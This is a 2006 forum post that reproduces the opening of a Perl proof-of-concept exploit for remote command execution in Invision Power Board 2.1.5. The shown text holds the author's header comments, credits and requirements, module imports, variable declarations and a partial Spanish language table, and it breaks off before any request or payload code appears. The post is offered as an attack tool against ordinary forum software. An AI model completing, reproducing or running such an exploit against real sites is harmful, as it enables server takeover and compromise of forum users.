ecstazy_kid Posted June 18, 2006 Report Posted June 18, 2006 #!/usr/bin/perl# Wed Apr 26 16:44:15 CEST 2006 jolascoaga@514.es## INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept## remote command execution. vuln credits goes to IceShaman.## works only if you have perms to post a comment. Exploit with replye is# in my TODO...## 514 still r0xing.# !dSR the hardc0re hax0rs # There is no kwel comments in this release, wait for next upgrade#######################################################################/use LWP::UserAgent;use HTTP::Cookies;use LWP::Simple;use HTTP::Request::Common "POST";use HTTP::Response;use Getopt::Long;use strict;$| = 1; # ;1 = |$my ($proxy,$proxy_user,$proxy_pass,$lang);my ($arg_host,$debug,$ipb_user,$ipb_pass, $lang, $errors, $topic_index, $tmp_var);my ($md5_key, $post_key, $tmp_var);my %lang_es = ( 'name' => 'Spanish Language', 'login' => "Ahora est??s identificado", 'incorrect' => "Nombre de usuario o contrase Quote